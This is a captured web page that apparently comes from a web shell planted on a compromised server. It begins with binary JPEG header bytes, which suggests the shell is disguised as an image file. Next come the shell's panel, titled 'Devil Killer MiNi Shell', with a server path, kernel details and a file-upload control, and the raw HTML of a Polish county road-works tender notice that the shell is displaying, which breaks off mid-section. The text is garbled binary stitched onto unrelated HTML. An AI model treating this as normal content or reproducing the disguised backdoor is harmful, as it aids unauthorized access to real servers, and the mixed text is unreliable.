JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230906/0038380501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa odcinka drogi powiatowej nr 1414 D w miejscowości Guzowice<br/> – droga dojazdowa do gruntów rolnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT MILICKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934673</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wojska Polskiego 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Milicz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">713840764</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">713840764</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@milicz-powiat.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.milicz-powiat.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa odcinka drogi powiatowej nr 1414 D w miejscowości Guzowice<br/> – droga dojazdowa do gruntów rolnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cd3083ab-4c99-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00383805</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-cd3083ab-4c99-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu<br/>środków komunikacji elektronicznej, za pośrednictwem platformy pod adresem:<br/>https://ezamowienia.gov.pl/, ePUAPu, dostępnego pod adresem: esp: /s83d04rpg5/SkrytkaESP oraz poczty elektronicznej<br/>urzad@milicz-powiat.pl. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują<br/>się numerem ogłoszenia (BZP, TED lub ID postępowania).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia, o których mowa<br/>w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby<br/>sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc,<br/>.docx, .odt . Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu pod adresem:<br/>https://media.ezamowienia.gov.pl/ pod/2021/10/Oferty-5.1.pdf.oraz Warunkach korzystania z elektronicznej platformy usług<br/>administracji publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Starosta Milicki z siedzibą w Starostwie Powiatowym w Miliczu ul. Wojska<br/>Polskiego 38, 56-300 Milicz;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@miliczpowiat.<br/>pl, tel: 071/38 40 704 wew. 51./;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego pod nazwą<br/>„Przebudowa odcinka drogi powiatowej nr 1414 D w miejscowości Guzowice<br/> – droga dojazdowa do gruntów rolnych” numer postępowania<br/>DP.7134.134.2023.BK prowadzonym w trybie podstawowym bez negocjacji w zw. z art. 275 ust. 1 ustawy PZP;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DP.7134.134.2023.BK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Opis przedmiotu zamówienia dla zadania, którego przedmiotem jest przebudowa odcinka drogi powiatowej nr 1414 D w miejscowości Guzowice – droga dojazdowa do gruntów rolnych, przebudowa odcinka drogi powiatowej na dł. 303 m (90 m nawierzchnia bitumiczna, 213 m droga gruntowa / z kruszywa) na odcinku od wysokości działki nr 176/4 do wysokości działki nr 280/2. Łączna długość odcinka – 0,303 km. Przedsięwzięcie obejmuje:<br/>- odtworzenie trasy i punktów wysokościowych (roboty pomiarowe przy liniowych robotach w terenie płaskim) – obsługa geodezyjna,<br/>- lokalną wycinkę krzewów rosnących w skupiskach do 25m2,<br/>- wycinkę drzew – według odrębnego opracowania,<br/>- roboty rozbiórkowe (frezowanie nawierzchni jezdni celem płynnego połączania nawierzchni istniejącej z zaprojektowaną, słupków granitowych, ścianek przepustów i rur przepustów i inne niezbędne do prawidłowego wykonania zadania),<br/>- ścinkę poboczy gruntowych z profilowaniem,<br/>- profilowanie rowów przydrożnych z umocnieniem płytami ażurowymi,<br/>- remont odwodnienia drogi zlokalizowanego w poboczu drogi,<br/>- przebudowę przepustów pod koroną drogi (nowe rury i ścianki, przy zachowaniu posadowienia wysokościowego),<br/>- uzupełnienie nasypu pod pobocze jezdni,<br/>- wykonanie przebudowy bitumicznej nawierzchni jezdni na odcinku od km 0+000 do km 0+090 o szer. zasadniczej jezdni 5,5m (droga klasy L) zakres: frezowanie istniejącej nawierzchni jezdni wzdłuż krawędzi na<br/>szer. 1,0m, koryto pod warstwy konstrukcyjne poszerzenia wraz z zagęszczeniem G4 – E2≥25MPa, warstwa mrozoochronna z mieszanki związanej cementem C1,5/2 ≤ 4,0MPa gr. 30cm dowożona z wytwórni E2≥80MPa, warstwa podbudowy zasadniczej z kruszywa łamanego C90/30 0/63 gr. 20cm Is≥1,00 i E2≥100MPa, skropienie emulsją asfaltową poszerzenia i sfrezowanej nawierzchni w ilości 0,5kg/m2,<br/>warstwa wyrównawcza z betonu asfaltowego AC16W 50/70 gr. 4cm na poszerzeniu i sfrezowanej nawierzchni, skropienie emulsją asfaltową jeśli zalecane przez producenta geosiatki i ułożenie geosiatki z włókien szklanych 50/50 wstępnie powleczonej asfaltem z zakładem 0,5m na poszerzenie i 0,5m na istniejącej nawierzchni, wykonanie warstw bitumicznych na istniejącej nawierzchni jezdni i poszerzeniu: skropienie emulsją asfaltową w ilości 0,5kg/m2 (lub w ilości zalecanej przez producenta geosiatki), wykonanie warstwy wyrównawczej AC16W<br/>50/70 w ilości śr. 125kg/m2 - jako wyrównanie nawierzchni pod warstwę ścieralną, skropienie warstwy wyrównawczej emulsją asfaltową w ilości 0,3kg/m2, wykonanie warstwy ścieralnej z betonu asfaltowego AC11S 50/70 gr. 4cm na wykonanej warstwie wyrównawczej,<br/>- wykonanie przebudowy nawierzchni jezdni gruntowej / z kruszywa na odcinku od km 0+090 do km 0+303 o szer. zasadniczej jezdni 5,0m (droga klasy L trudne warunki terenowe, wąski pas drogowy, słupy energetyczne, rów, skarpy) z poszerzeniem na skrzyżowaniu i w rejonie łuku kołowego na końcu opracowania do 6,0m zakres: koryto pod warstwy konstrukcyjne nawierzchni z wyprofilowaniem niwelety nawierzchni jezdni - obniżeniem wraz z zagęszczeniem G4 – E2≥25MPa, warstwa mrozoochronna z mieszanki związanej cementem C1,5/2 ≤ 4,0MPa gr. 30cm wykonywana na miejscu E2≥80MPa, warstwa podbudowy zasadniczej z kruszywa łamanego C90/30 0/63 gr. 20cm E2≥100MPa, skropienie emulsją asfaltową w ilości 0,5kg/m2, wykonanie warstwy wiążącej z betonu asfaltowego AC16W 50/70 gr. 5cm, skropienie emulsją asfaltową w ilości 0,3kg/m2, wykonanie warstwy ścieralnej z betonu asfaltowego AC11S 50/70 gr. 4cm,<br/>- przebudowę istniejących zjazdów zwykłych klasy D i C2 z promieniami wyokrąglającymi, zakres prac: koryto pod warstwy konstrukcyjne nawierzchni G4 E2≥25MPa, warstwa mrozoochronna z mieszanki związanej cementem C1,5/2 ≤ 4,0MPa gr. 30cm dowożona z wytwórni E2≥80MPa, warstwa podbudowy zasadniczej z kruszywa łamanego C90/30 0/63 gr. 20cm E2≥100MPa, skropienie emulsją asfaltową w ilości 0,5kg/m2, wykonanie warstwy wiążącej z betonu asfaltowego AC16W 50/70 gr. 5cm, skropienie emulsją asfaltową w ilości 0,5kg/m2, wykonanie warstwy ścieralnej z betonu asfaltowego AC11S 50/70 gr. 4cm,<br/>- wykonanie poboczy z kruszywa łamanego szer. 0,75m (korytowanie, zagęszczenie, warstwa kruszywa łamanego CNR 0/31,5 gr. 15cm lub 30cm zgodnie z przekrojem zagęszczonego mechanicznie),<br/>- wymianę barier drogowych na przepustach,<br/>- uporządkowanie pasa drogowego po zakończonych robotach,<br/>- inwentaryzację powykonawczą robót.<br/>Szczegółowy opis przedmiotu zamówienia zawiera Dokumentacja techniczna (stanowiąca Opis Przedmiotu Zamówienia - OPZ) na którą składają się: opis techniczny z częścią rysunkową, informacje dot. BIOZ, kosztorys ofertowy, przedmiar robót, szczegółowe specyfikacje techniczne wykonania i odbioru robót - stanowiąca załącznik nr 1 do niniejszej SWZ.<br/>1)	W cenie oferty należy uwzględnić koszty związane z wykonaniem projektu oznakowania i zabezpieczenia robót na czas prowadzenia robót.<br/>2)	Roboty należy wykonać zgodnie z załączoną do SWZ Dokumentacją techniczną, Specyfikacjami Technicznymi oraz pozostałymi wymaganiami szczegółowo określonymi w załączniku nr 1 do niniejszej SWZ.<br/>3)	Zamawiający wymaga złożenia do oferty kosztorysu ofertowego na podstawie którego będzie oszacowana łączna wartość zadania, pod rygorem odrzucenia oferty. Kosztorys ofertowy ma odzwierciedlać pozycje z przedmiaru robót, który stanowi integralną część dokumentacji technicznej będącej załącznikiem nr 1 do SWZ.<br/>4)	Podstawę do zapłaty wynagrodzenia stanowić będzie faktura wystawiona przez Wykonawcę, po dokonaniu końcowego odbioru robót, płatna przelewem na rachunek Wykonawcy w terminie do 30 dni od dnia otrzymania faktury, przy czym za dzień zapłaty uznawany będzie dzień obciążenia rachunku Zamawiającego.<br/>5)	Zamawiający nie przewiduje możliwości udzielenia zaliczki na poczet wykonania przedmiotu zamówienia. <br/>6)	Dla przedmiotowej inwestycji Zamawiający ustanowi nadzór inwestorski.<br/>7)	Wykonawca wystawi faktury zgodnie z danymi: Nabywca: Powiat Milicki, ul. Wojska Polskiego 38, 56-300 Milicz, NIP: 916-13-12-494, Odbiorca: Starostwo Powiatowe w Miliczu, ul. Wojska Polskiego 38, 56-300 Milicz.<br/>II. Wymagania stawiane Wykonawcy:<br/>1)	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.<br/>2)	Wymagana jest należyta staranność przy realizacji zobowiązań umowy. Ustalenia i decyzje dotyczące wykonania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.<br/>3) Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.<br/>4)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.<br/>5)	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w istotnych postanowieniach umownych zawartych w projektowanych postanowieniach umowy - wzorze umowy stanowiącym załącznik nr 2 do SWZ.<br/>III. Zamawiający nie dopuszcza możliwości składania ofert częściowych.<br/>IV. Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>V. Zamawiający nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej.<br/>VI. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.<br/>VII. Zamawiający nie dopuszcza składania ofert wariantowych oraz w postaci katalogów elektronicznych.<br/>VIII. Zamawiający nie przewiduje możliwości udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt. 7 i 8 p.z.p.<br/>Wspólny Słownik Zamówień (CPV): <br/>- 45.23.31.40-2 – roboty drogowe<br/>- 45.23.31.42-6 – roboty w zakresie naprawy dróg<br/>- 45.11.12.00-0 – roboty w zakresie przygotowania terenu pod budowę i roboty ziemne<br/>- 45.23.32.20-7 – roboty w zakresie nawierzchni dróg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami:<br/>- najniższa łączna cena oferty brutto: waga 60 % (60 pkt.), sposób oceny - minimalizacja<br/>- okres gwarancji jakości GW): waga max. 40% (40 pkt.), minimalny wymagany okres gwarancji jakości – 36 miesięcy, zakreśla się<br/>maksymalny okres gwarancji, który wynosi 60 miesięcy.<br/>Wykonawca zobowiązany jest do podania w „Formularzu ofertowym” okresu gwarancji. Oferty Wykonawców którzy zaoferują okres<br/>gwarancji krótszy lub dłuższy niż wskazany jako minimalny lub maksymalny w SWZ przez Zamawiającego zostaną odrzucone jako<br/>niezgodne z zapisami SWZ, na podstawie art. 226 ustawy PZP.<br/>Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione wyżej kryteria. Oferty będą oceniane w odniesieniu do<br/>najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie każdego z kryterium.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną ilość punktów.<br/>Pozostałym wykonawcom, wypełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie<br/>mniejsza) ilość punktów.<br/>2. Zamawiający za najkorzystniejszą uzna ofertę, która nie będzie podlegała odrzuceniu oraz uzyska największą sumę punktów<br/>wyliczoną zgodnie ze wzorem: Najkorzystniejsza oferta = liczba punktów cena + liczba punktów przyznanych za okres gwarancji<br/>jakości GW.<br/>3. Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam<br/>bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z najniższą ceną.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.<br/>5 .Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości GW, minimalny wymagany okres gwarancji jakości – 36 miesięcy, zakreśla się maksymalny okres gwarancji, który wynosi 60 miesięcy. Wykonawca zobowiązany jest do podania w „Formularzu ofertowym” okresu gwarancji. Oferty Wykonawców którzy zaoferują okres gwarancji krótszy lub dłuższy niż wskazany jako minimalny lub maksymalny w SWZ przez Zamawiającego zostaną odrzucone jako niezgodne z zapisami SWZ, na podstawie art. 226 ustawy PZP</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/> 1) zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/> 2) 